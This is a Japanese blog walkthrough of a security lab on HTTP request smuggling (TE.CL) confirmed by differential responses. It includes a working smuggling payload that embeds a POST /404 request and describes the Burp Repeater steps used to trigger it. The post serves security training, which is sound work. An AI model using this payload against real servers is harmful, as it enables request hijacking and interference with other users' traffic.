shikata ga nai

Private? There is no such things.

HTTP request smuggling, confirming a TE.CL vulnerability via differential responsesをやってみた

Hello there, ('ω')ノ

 

HTTPリクエストスマグリング、差分応答によるTE.CLの脆弱性の確認を。

このラボには、フロントエンドサーバとバックエンドサーバがあって。

バックエンドサーバは、チャンクエンコーディングをサポートしていないとのことで。

リクエストスマグリングをバックエンドサーバに。

次のリクエストが / (Webルート)が404答コードを与えることを確認しなさいと。

 

悪用するヒントは、下記のとおりで。

 最後の0の後に\ r \ n \ r \ nを含めて。

 Burp Repeaterの「UpdateContent-Length」オプションのチェックを外して。

 

まずは、ページにアクセスして。

 

f:id:ThisIsOne:20210414081648p:plain


リクエストをリピータへ。

 

f:id:ThisIsOne:20210414081738p:plain

 

f:id:ThisIsOne:20210414081810p:plain

 

下記と入れ替えて。

 

Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

 

f:id:ThisIsOne:20210414081923p:plain

 

UpdateContent-Lengthをオフにしてから。

そうしないと数値が変わってしまうので。

POSTメソッドに変更して、Sendして。


f:id:ThisIsOne:20210414082440p:plain

 

f:id:ThisIsOne:20210414082507p:plain

 

再度、Sendすると。

 

f:id:ThisIsOne:20210414082532p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210414082606p:plain

 

リクエストスマグリング攻撃の長さフィールドを手動で修正するのは難しいので。

Burp拡張機能のHTTPRequest Smugglerが役立つようで。

またの機会にでも使ってみようかと。

 

f:id:ThisIsOne:20210414083549p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain